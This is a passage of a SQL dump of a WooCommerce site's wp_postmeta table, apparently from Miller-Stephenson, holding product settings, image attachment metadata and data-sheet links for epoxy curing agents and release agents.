INSERT INTO `wp_postmeta` VALUES (13518, 1193, '_sale_price_dates_to', ''); 
INSERT INTO `wp_postmeta` VALUES (13519, 1193, '_price', ''); 
INSERT INTO `wp_postmeta` VALUES (13520, 1193, '_sold_individually', ''); 
INSERT INTO `wp_postmeta` VALUES (13521, 1193, '_manage_stock', 'no'); 
INSERT INTO `wp_postmeta` VALUES (13522, 1193, '_backorders', 'no'); 
INSERT INTO `wp_postmeta` VALUES (13523, 1193, '_stock', ''); 
INSERT INTO `wp_postmeta` VALUES (13524, 1193, '_upsell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (13525, 1193, '_crosssell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (13526, 1193, '_product_version', '2.6.4'); 
INSERT INTO `wp_postmeta` VALUES (13527, 1193, '_ywtm_hide_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (13528, 1193, '_ywtm_override_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (13529, 1193, '_ywtm_priority_tab_reviews', '30'); 
INSERT INTO `wp_postmeta` VALUES (13530, 1193, '_ywtm_title_tab_reviews', 'Reviews (%d)'); 
INSERT INTO `wp_postmeta` VALUES (13531, 1193, '_product_image_gallery', ''); 
INSERT INTO `wp_postmeta` VALUES (13532, 1188, '_edit_last', '2'); 
INSERT INTO `wp_postmeta` VALUES (13547, 1198, '_edit_lock', '1474651353:3'); 
INSERT INTO `wp_postmeta` VALUES (13548, 1198, '_edit_last', '3'); 
INSERT INTO `wp_postmeta` VALUES (13549, 1193, '_wc_review_count', '0'); 
INSERT INTO `wp_postmeta` VALUES (13555, 1200, '_wp_attached_file', '2016/09/release-agents-releasys-2-e1472836346217.jpg'); 
INSERT INTO `wp_postmeta` VALUES (13556, 1200, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:945;s:6:"height";i:68;s:4:"file";s:52:"2016/09/release-agents-releasys-2-e1472836346217.jpg";s:5:"sizes";a:7:{s:9:"thumbnail";a:4:{s:4:"file";s:51:"release-agents-releasys-2-e1472836346217-340x68.jpg";s:5:"width";i:340;s:6:"height";i:68;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:51:"release-agents-releasys-2-e1472836346217-800x58.jpg";s:5:"width";i:800;s:6:"height";i:58;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:51:"release-agents-releasys-2-e1472836346217-768x55.jpg";s:5:"width";i:768;s:6:"height";i:55;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:51:"release-agents-releasys-2-e1472836346217-250x68.jpg";s:5:"width";i:250;s:6:"height";i:68;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:51:"release-agents-releasys-2-e1472836346217-200x68.jpg";s:5:"width";i:200;s:6:"height";i:68;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:51:"release-agents-releasys-2-e1472836346217-225x68.jpg";s:5:"width";i:225;s:6:"height";i:68;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:51:"release-agents-releasys-2-e1472836346217-510x68.jpg";s:5:"width";i:510;s:6:"height";i:68;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"5";s:8:"quantity";d:100;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (13557, 1200, '_edit_lock', '1472836352:2'); 
INSERT INTO `wp_postmeta` VALUES (13558, 1200, '_wp_attachment_backup_sizes', 'a:7:{s:9:"full-orig";a:3:{s:5:"width";i:945;s:6:"height";i:68;s:4:"file";s:29:"release-agents-releasys-2.jpg";}s:14:"thumbnail-orig";a:4:{s:4:"file";s:36:"release-agents-releasys-2-340x68.jpg";s:5:"width";i:340;s:6:"height";i:68;s:9:"mime-type";s:10:"image/jpeg";}s:11:"medium-orig";a:4:{s:4:"file";s:36:"release-agents-releasys-2-800x58.jpg";s:5:"width";i:800;s:6:"height";i:58;s:9:"mime-type";s:10:"image/jpeg";}s:17:"medium_large-orig";a:4:{s:4:"file";s:36:"release-agents-releasys-2-768x55.jpg";s:5:"width";i:768;s:6:"height";i:55;s:9:"mime-type";s:10:"image/jpeg";}s:19:"shop_thumbnail-orig";a:4:{s:4:"file";s:36:"release-agents-releasys-2-180x68.jpg";s:5:"width";i:180;s:6:"height";i:68;s:9:"mime-type";s:10:"image/jpeg";}s:17:"shop_catalog-orig";a:4:{s:4:"file";s:36:"release-agents-releasys-2-300x68.jpg";s:5:"width";i:300;s:6:"height";i:68;s:9:"mime-type";s:10:"image/jpeg";}s:16:"shop_single-orig";a:4:{s:4:"file";s:36:"release-agents-releasys-2-400x68.jpg";s:5:"width";i:400;s:6:"height";i:68;s:9:"mime-type";s:10:"image/jpeg";}}'); 
INSERT INTO `wp_postmeta` VALUES (13559, 1200, '_edit_last', '2'); 
INSERT INTO `wp_postmeta` VALUES (13560, 1201, '_wp_attached_file', '2016/09/3290.pdf'); 
INSERT INTO `wp_postmeta` VALUES (13561, 1198, '_visibility', 'visible'); 
INSERT INTO `wp_postmeta` VALUES (13562, 1198, '_stock_status', 'instock'); 
INSERT INTO `wp_postmeta` VALUES (13563, 1198, '312_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (13564, 1198, '716_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (13565, 1198, '719_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (13566, 1198, '318_custom_list_file', 'a:2:{s:32:"0fbf824a350d245ce44f81720d50050f";a:3:{s:4:"name";s:12:"EPIKURE 3290";s:4:"file";s:69:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/3290.pdf";s:4:"desc";s:16:"EPIKURE 3290 TDS";}s:32:"ff92899c6252b7533008f499204b4077";a:3:{s:4:"name";s:16:"Product Overview";s:4:"file";s:90:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/curing-agent-overview-new.pdf";s:4:"desc";s:16:"Product Overview";}}'); 
INSERT INTO `wp_postmeta` VALUES (13567, 1198, '317_default_editor', 'Quart, Gallon, 5 Gallon, and 55 Gallon'); 
INSERT INTO `wp_postmeta` VALUES (13568, 1198, 'wc_productdata_options', 'a:1:{i:0;a:6:{s:11:"_bubble_new";s:0:"";s:12:"_bubble_text";s:0:"";s:17:"_custom_tab_title";s:0:"";s:11:"_custom_tab";s:0:"";s:14:"_product_video";s:0:"";s:19:"_product_video_size";s:0:"";}}'); 
INSERT INTO `wp_postmeta` VALUES (13569, 1198, 'total_sales', '0'); 
INSERT INTO `wp_postmeta` VALUES (13570, 1198, '_downloadable', 'no'); 
INSERT INTO `wp_postmeta` VALUES (13571, 1198, '_virtual', 'no'); 
INSERT INTO `wp_postmeta` VALUES (13572, 1198, '_purchase_note', ''); 
INSERT INTO `wp_postmeta` VALUES (13573, 1198, '_featured', 'no'); 
INSERT INTO `wp_postmeta` VALUES (13574, 1198, '_weight', ''); 
INSERT INTO `wp_postmeta` VALUES (13575, 1198, '_length', ''); 
INSERT INTO `wp_postmeta` VALUES (13576, 1198, '_width', ''); 
INSERT INTO `wp_postmeta` VALUES (13577, 1198, '_height', ''); 
INSERT INTO `wp_postmeta` VALUES (13578, 1198, '_sku', ''); 
INSERT INTO `wp_postmeta` VALUES (13579, 1198, '_product_attributes', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (13580, 1198, '_regular_price', ''); 
INSERT INTO `wp_postmeta` VALUES (13581, 1198, '_sale_price', ''); 
INSERT INTO `wp_postmeta` VALUES (13582, 1198, '_sale_price_dates_from', ''); 
INSERT INTO `wp_postmeta` VALUES (13583, 1198, '_sale_price_dates_to', ''); 
INSERT INTO `wp_postmeta` VALUES (13584, 1198, '_price', ''); 
INSERT INTO `wp_postmeta` VALUES (13585, 1198, '_sold_individually', ''); 
INSERT INTO `wp_postmeta` VALUES (13586, 1198, '_manage_stock', 'no'); 
INSERT INTO `wp_postmeta` VALUES (13587, 1198, '_backorders', 'no'); 
INSERT INTO `wp_postmeta` VALUES (13588, 1198, '_stock', ''); 
INSERT INTO `wp_postmeta` VALUES (13589, 1198, '_upsell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (13590, 1198, '_crosssell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (13591, 1198, '_product_version', '2.6.4'); 
INSERT INTO `wp_postmeta` VALUES (13592, 1198, '_ywtm_hide_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (13593, 1198, '_ywtm_override_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (13594, 1198, '_ywtm_priority_tab_reviews', '30'); 
INSERT INTO `wp_postmeta` VALUES (13595, 1198, '_ywtm_title_tab_reviews', 'Reviews (%d)'); 
INSERT INTO `wp_postmeta` VALUES (13596, 1198, '_product_image_gallery', ''); 
INSERT INTO `wp_postmeta` VALUES (13610, 1205, '_wp_attached_file', '2016/09/miller-stephenson-release-agents-e1472837301210.jpg'); 
INSERT INTO `wp_postmeta` VALUES (13611, 1205, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:945;s:6:"height";i:68;s:4:"file";s:59:"2016/09/miller-stephenson-release-agents-e1472837301210.jpg";s:5:"sizes";a:7:{s:9:"thumbnail";a:4:{s:4:"file";s:58:"miller-stephenson-release-agents-e1472837301210-340x68.jpg";s:5:"width";i:340;s:6:"height";i:68;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:58:"miller-stephenson-release-agents-e1472837301210-800x58.jpg";s:5:"width";i:800;s:6:"height";i:58;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:58:"miller-stephenson-release-agents-e1472837301210-768x55.jpg";s:5:"width";i:768;s:6:"height";i:55;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:58:"miller-stephenson-release-agents-e1472837301210-250x68.jpg";s:5:"width";i:250;s:6:"height";i:68;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:58:"miller-stephenson-release-agents-e1472837301210-200x68.jpg";s:5:"width";i:200;s:6:"height";i:68;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:58:"miller-stephenson-release-agents-e1472837301210-225x68.jpg";s:5:"width";i:225;s:6:"height";i:68;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:58:"miller-stephenson-release-agents-e1472837301210-510x68.jpg";s:5:"width";i:510;s:6:"height";i:68;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"5";s:8:"quantity";d:100;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (13614, 1205, '_edit_lock', '1472837167:2'); 
INSERT INTO `wp_postmeta` VALUES (13615, 1205, '_wp_attachment_backup_sizes', 'a:7:{s:9:"full-orig";a:3:{s:5:"width";i:945;s:6:"height";i:68;s:4:"file";s:36:"miller-stephenson-release-agents.jpg";}s:14:"thumbnail-orig";a:4:{s:4:"file";s:43:"miller-stephenson-release-agents-340x68.jpg";s:5:"width";i:340;s:6:"height";i:68;s:9:"mime-type";s:10:"image/jpeg";}s:11:"medium-orig";a:4:{s:4:"file";s:43:"miller-stephenson-release-agents-800x58.jpg";s:5:"width";i:800;s:6:"height";i:58;s:9:"mime-type";s:10:"image/jpeg";}s:17:"medium_large-orig";a:4:{s:4:"file";s:43:"miller-stephenson-release-agents-768x55.jpg";s:5:"width";i:768;s:6:"height";i:55;s:9:"mime-type";s:10:"image/jpeg";}s:19:"shop_thumbnail-orig";a:4:{s:4:"file";s:43:"miller-stephenson-release-agents-180x68.jpg";s:5:"width";i:180;s:6:"height";i:68;s:9:"mime-type";s:10:"image/jpeg";}s:17:"shop_catalog-orig";a:4:{s:4:"file";s:43:"miller-stephenson-release-agents-300x68.jpg";s:5:"width";i:300;s:6:"height";i:68;s:9:"mime-type";s:10:"image/jpeg";}s:16:"shop_single-orig";a:4:{s:4:"file";s:43:"miller-stephenson-release-agents-400x68.jpg";s:5:"width";i:400;s:6:"height";i:68;s:9:"mime-type";s:10:"image/jpeg";}}'); 
INSERT INTO `wp_postmeta` VALUES (13616, 1205, '_edit_last', '2'); 
INSERT INTO `wp_postmeta` VALUES (13621, 1208, '_wp_attached_file', '2016/09/PTFE-RELEASE-AGENTS-e1472837418627.jpg'); 
INSERT INTO `wp_postmeta` VALUES (13622, 1208, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:945;s:6:"height";i:68;s:4:"file";s:46:"2016/09/PTFE-RELEASE-AGENTS-e1472837418627.jpg";s:5:"sizes";a:7:{s:9:"thumbnail";a:4:{s:4:"file";s:45:"PTFE-RELEASE-AGENTS-e1472837418627-340x68.jpg";s:5:"width";i:340;s:6:"height";i:68;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:45:"PTFE-RELEASE-AGENTS-e1472837418627-800x58.jpg";s:5:"width";i:800;s:6:"height";i:58;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:45:"PTFE-RELEASE-AGENTS-e1472837418627-768x55.jpg";s:5:"width";i:768;s:6:"height";i:55;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:45:"PTFE-RELEASE-AGENTS-e1472837418627-250x68.jpg";s:5:"width";i:250;s:6:"height";i:68;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:45:"PTFE-RELEASE-AGENTS-e1472837418627-200x68.jpg";s:5:"width";i:200;s:6:"height";i:68;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:45:"PTFE-RELEASE-AGENTS-e1472837418627-225x68.jpg";s:5:"width";i:225;s:6:"height";i:68;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:45:"PTFE-RELEASE-AGENTS-e1472837418627-510x68.jpg";s:5:"width";i:510;s:6:"height";i:68;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"3";s:8:"quantity";d:100;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (13623, 1208, '_edit_lock', '1472837278:2'); 
INSERT INTO `wp_postmeta` VALUES (13624, 1208, '_wp_attachment_backup_sizes', 'a:7:{s:9:"full-orig";a:3:{s:5:"width";i:945;s:6:"height";i:68;s:4:"file";s:23:"PTFE-RELEASE-AGENTS.jpg";}s:14:"thumbnail-orig";a:4:{s:4:"file";s:30:"PTFE-RELEASE-AGENTS-340x68.jpg";s:5:"width";i:340;s:6:"height";i:68;s:9:"mime-type";s:10:"image/jpeg";}s:11:"medium-orig";a:4:{s:4:"file";s:30:"PTFE-RELEASE-AGENTS-800x58.jpg";s:5:"width";i:800;s:6:"height";i:58;s:9:"mime-type";s:10:"image/jpeg";}s:17:"medium_large-orig";a:4:{s:4:"file";s:30:"PTFE-RELEASE-AGENTS-768x55.jpg";s:5:"width";i:768;s:6:"height";i:55;s:9:"mime-type";s:10:"image/jpeg";}s:19:"shop_thumbnail-orig";a:4:{s:4:"file";s:30:"PTFE-RELEASE-AGENTS-180x68.jpg";s:5:"width";i:180;s:6:"height";i:68;s:9:"mime-type";s:10:"image/jpeg";}s:17:"shop_catalog-orig";a:4:{s:4:"file";s:30:"PTFE-RELEASE-AGENTS-300x68.jpg";s:5:"width";i:300;s:6:"height";i:68;s:9:"mime-type";s:10:"image/jpeg";}s:16:"shop_single-orig";a:4:{s:4:"file";s:30:"PTFE-RELEASE-AGENTS-400x68.jpg";s:5:"width";i:400;s:6:"height";i:68;s:9:"mime-type";s:10:"image/jpeg";}}'); 
INSERT INTO `wp_postmeta` VALUES (13625, 1209, '_edit_lock', '1474651343:3'); 
INSERT INTO `wp_postmeta` VALUES (13626, 1209, '_edit_last', '3'); 
INSERT INTO `wp_postmeta` VALUES (13627, 1210, '_wp_attached_file', '2016/09/High-temperature-release-agents-e1472837552833.jpg'); 
INSERT INTO `wp_postmeta` VALUES (13628, 1210, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:945;s:6:"height";i:68;s:4:"file";s:58:"2016/09/High-temperature-release-agents-e1472837552833.jpg";s:5:"sizes";a:7:{s:9:"thumbnail";a:4:{s:4:"file";s:57:"High-temperature-release-agents-e1472837552833-340x68.jpg";s:5:"width";i:340;s:6:"height";i:68;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:57:"High-temperature-release-agents-e1472837552833-800x58.jpg";s:5:"width";i:800;s:6:"height";i:58;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:57:"High-temperature-release-agents-e1472837552833-768x55.jpg";s:5:"width";i:768;s:6:"height";i:55;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:57:"High-temperature-release-agents-e1472837552833-250x68.jpg";s:5:"width";i:250;s:6:"height";i:68;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:57:"High-temperature-release-agents-e1472837552833-200x68.jpg";s:5:"width";i:200;s:6:"height";i:68;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:57:"High-temperature-release-agents-e1472837552833-225x68.jpg";s:5:"width";i:225;s:6:"height";i:68;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:57:"High-temperature-release-agents-e1472837552833-510x68.jpg";s:5:"width";i:510;s:6:"height";i:68;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"5";s:8:"quantity";d:100;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (13629, 1210, '_edit_lock', '1472837416:2'); 
INSERT INTO `wp_postmeta` VALUES (13630, 1210, '_wp_attachment_backup_sizes', 'a:7:{s:9:"full-orig";a:3:{s:5:"width";i:945;s:6:"height";i:68;s:4:"file";s:35:"High-temperature-release-agents.jpg";}s:14:"thumbnail-orig";a:4:{s:4:"file";s:42:"High-temperature-release-agents-340x68.jpg";s:5:"width";i:340;s:6:"height";i:68;s:9:"mime-type";s:10:"image/jpeg";}s:11:"medium-orig";a:4:{s:4:"file";s:42:"High-temperature-release-agents-800x58.jpg";s:5:"width";i:800;s:6:"height";i:58;s:9:"mime-type";s:10:"image/jpeg";}s:17:"medium_large-orig";a:4:{s:4:"file";s:42:"High-temperature-release-agents-768x55.jpg";s:5:"width";i:768;s:6:"height";i:55;s:9:"mime-type";s:10:"image/jpeg";}s:19:"shop_thumbnail-orig";a:4:{s:4:"file";s:42:"High-temperature-release-agents-180x68.jpg";s:5:"width";i:180;s:6:"height";i:68;s:9:"mime-type";s:10:"image/jpeg";}s:17:"shop_catalog-orig";a:4:{s:4:"file";s:42:"High-temperature-release-agents-300x68.jpg";s:5:"width";i:300;s:6:"height";i:68;s:9:"mime-type";s:10:"image/jpeg";}s:16:"shop_single-orig";a:4:{s:4:"file";s:42:"High-temperature-release-agents-400x68.jpg";s:5:"width";i:400;s:6:"height";i:68;s:9:"mime-type";s:10:"image/jpeg";}}'); 
INSERT INTO `wp_postmeta` VALUES (13631, 1210, '_edit_last', '2'); 
INSERT INTO `wp_postmeta` VALUES (13632, 1211, '_wp_attached_file', '2016/09/3295.pdf'); 
INSERT INTO `wp_postmeta` VALUES (13633, 1209, '_visibility', 'visible'); 
INSERT INTO `wp_postmeta` VALUES (13634, 1209, '_stock_status', 'instock'); 
INSERT INTO `wp_postmeta` VALUES (13635, 1209, '312_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (13636, 1209, '716_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (13637, 1209, '719_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (13638, 1209, '318_custom_list_file', 'a:2:{s:32:"7a681ba67835a6d3f2afb9c853980017";a:3:{s:4:"name";s:12:"EPIKURE 3295";s:4:"file";s:69:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/3295.pdf";s:4:"desc";s:16:"EPIKURE 3295 TDS";}s:32:"3bbe1fba862bb67c5aa96d80c266bb15";a:3:{s:4:"name";s:16:"Product Overview";s:4:"file";s:90:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/curing-agent-overview-new.pdf";s:4:"desc";s:16:"Product Overview";}}'); 
INSERT INTO `wp_postmeta` VALUES (13639, 1209, '317_default_editor', 'Quart, Gallon, 5 Gallon, and 55 Gallon'); 
INSERT INTO `wp_postmeta` VALUES (13640, 1209, 'wc_productdata_options', 'a:1:{i:0;a:6:{s:11:"_bubble_new";s:0:"";s:12:"_bubble_text";s:0:"";s:17:"_custom_tab_title";s:0:"";s:11:"_custom_tab";s:0:"";s:14:"_product_video";s:0:"";s:19:"_product_video_size";s:0:"";}}'); 
INSERT INTO `wp_postmeta` VALUES (13641, 1209, 'total_sales', '0'); 
INSERT INTO `wp_postmeta` VALUES (13642, 1209, '_downloadable', 'no'); 
INSERT INTO `wp_postmeta` VALUES (13643, 1209, '_virtual', 'no'); 
INSERT INTO `wp_postmeta` VALUES (13644, 1209, '_purchase_note', ''); 
INSERT INTO `wp_postmeta` VALUES (13645, 1209, '_featured', 'no'); 
INSERT INTO `wp_postmeta` VALUES (13646, 1209, '_weight', ''); 
INSERT INTO `wp_postmeta` VALUES (13647, 1209, '_length', ''); 
INSERT INTO `wp_postmeta` VALUES (13648, 1209, '_width', ''); 
INSERT INTO `wp_postmeta` VALUES (13649, 1209, '_height', ''); 
INSERT INTO `wp_postmeta` VALUES (13650, 1209, '_sku', ''); 
INSERT INTO `wp_postmeta` VALUES (13651, 1209, '_product_attributes', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (13652, 1209, '_regular_price', ''); 
INSERT INTO `wp_postmeta` VALUES (13653, 1209, '_sale_price', ''); 
INSERT INTO `wp_postmeta` VALUES (13654, 1209, '_sale_price_dates_from', ''); 
INSERT INTO `wp_postmeta` VALUES (13655, 1209, '_sale_price_dates_to', ''); 
INSERT INTO `wp_postmeta` VALUES (13656, 1209, '_price', ''); 
INSERT INTO `wp_postmeta` VALUES (13657, 1209, '_sold_individually', ''); 
INSERT INTO `wp_postmeta` VALUES (13658, 1209, '_manage_stock', 'no'); 
INSERT INTO `wp_postmeta` VALUES (13659, 1209, '_backorders', 'no'); 
INSERT INTO `wp_postmeta` VALUES (13660, 1209, '_stock', ''); 
INSERT INTO `wp_postmeta` VALUES (13661, 1209, '_upsell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (13662, 1209, '_crosssell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (13663, 1209, '_product_version', '2.6.4'); 
INSERT INTO `wp_postmeta` VALUES (13664, 1209, '_ywtm_hide_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (13665, 1209, '_ywtm_override_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (13666, 1209, '_ywtm_priority_tab_reviews', '30'); 
INSERT INTO `wp_postmeta` VALUES (13667, 1209, '_ywtm_title_tab_reviews', 'Reviews (%d)'); 
INSERT INTO `wp_postmeta` VALUES (13668, 1209, '_product_image_gallery', ''); 
INSERT INTO `wp_postmeta` VALUES (13669, 789, '_wc_review_count', '0'); 
INSERT INTO `wp_postmeta` VALUES (13670, 1212, '_edit_lock', '1474470825:2'); 
INSERT INTO `wp_postmeta` VALUES (13671, 1212, '_edit_last', '2'); 
INSERT INTO `wp_postmeta` VALUES (13672, 1215, '_wp_attached_file', '2016/09/heloxy-116.pdf'); 
INSERT INTO `wp_postmeta` VALUES (13673, 1212, '_visibility', 'visible'); 
INSERT INTO `wp_postmeta` VALUES (13674, 1212, '_stock_status', 'instock'); 
INSERT INTO `wp_postmeta` VALUES (13675, 1212, '312_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (13676, 1212, '716_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (13677, 1212, '719_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (13678, 1212, '318_custom_list_file', 'a:2:{s:32:"764523049deeb0ce26407125914b270c";a:3:{s:4:"name";s:10:"HELOXY 116";s:4:"file";s:75:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/heloxy-116.pdf";s:4:"desc";s:14:"HELOXY 116 TDS";}s:32:"c78e106104e2bb32291acf067cc01211";a:3:{s:4:"name";s:16:"Product Overview";s:4:"file";s:84:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/heloxy-overview-new.pdf";s:4:"desc";s:16:"Product Overview";}}'); 
INSERT INTO `wp_postmeta` VALUES (13679, 1212, '317_default_editor', 'Quart, Gallon, 5 Gallon, and 55 Gallon'); 
INSERT INTO `wp_postmeta` VALUES (13680, 1212, 'wc_productdata_options', 'a:1:{i:0;a:6:{s:11:"_bubble_new";s:0:"";s:12:"_bubble_text";s:0:"";s:17:"_custom_tab_title";s:0:"";s:11:"_custom_tab";s:0:"";s:14:"_product_video";s:0:"";s:19:"_product_video_size";s:0:"";}}'); 
INSERT INTO `wp_postmeta` VALUES (13681, 1212, 'total_sales', '0'); 
INSERT INTO `wp_postmeta` VALUES (13682, 1212, '_downloadable', 'no'); 
INSERT INTO `wp_postmeta` VALUES (13683, 1212, '_virtual', 'no'); 
INSERT INTO `wp_postmeta` VALUES (13684, 1212, '_purchase_note', ''); 
INSERT INTO `wp_postmeta` VALUES (13685, 1212, '_featured', 'no'); 
INSERT INTO `wp_postmeta` VALUES (13686, 1212, '_weight', ''); 
INSERT INTO `wp_postmeta` VALUES (13687, 1212, '_length', ''); 
INSERT INTO `wp_postmeta` VALUES (13688, 1212, '_width', ''); 
INSERT INTO `wp_postmeta` VALUES (13689, 1212, '_height', ''); 
INSERT INTO `wp_postmeta` VALUES (13690, 1212, '_sku', ''); 
INSERT INTO `wp_postmeta` VALUES (13691, 1212, '_product_attributes', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (13692, 1212, '_regular_price', ''); 
INSERT INTO `wp_postmeta` VALUES (13693, 1212, '_sale_price', ''); 
INSERT INTO `wp_postmeta` VALUES (13694, 1212, '_sale_price_dates_from', ''); 
INSERT INTO `wp_postmeta` VALUES (13695, 1212, '_sale_price_dates_to', ''); 
INSERT INTO `wp_postmeta` VALUES (13696, 1212, '_price', ''); 
INSERT INTO `wp_postmeta` VALUES (13697, 1212, '_sold_individually', ''); 
INSERT INTO `wp_postmeta` VALUES (13698, 1212, '_manage_stock', 'no'); 
INSERT INTO `wp_postmeta` VALUES (13699, 1212, '_backorders', 'no'); 
INSERT INTO `wp_postmeta` VALUES (13700, 1212, '_stock', ''); 
INSERT INTO `wp_postmeta` VALUES (13701, 1212, '_upsell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (13702, 1212, '_crosssell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (13703, 1212, '_product_version', '2.6.4'); 
INSERT INTO `wp_postmeta` VALUES (13704, 1212, '_ywtm_hide_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (13705, 1212, '_ywtm_override_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (13706, 1212, '_ywtm_priority_tab_reviews', '30'); 
INSERT INTO `wp_postmeta` VALUES (13707, 1212, '_ywtm_title_tab_reviews', 'Reviews (%d)'); 
INSERT INTO `wp_postmeta` VALUES (13708, 1212, '_product_image_gallery', ''); 
INSERT INTO `wp_postmeta` VALUES (13709, 1212, '_wc_review_count', '0'); 
INSERT INTO `wp_postmeta` VALUES (13710, 1216, '_edit_lock', '1474470257:2'); 
INSERT INTO `wp_postmeta` VALUES (13711, 1216, '_edit_last', '2'); 
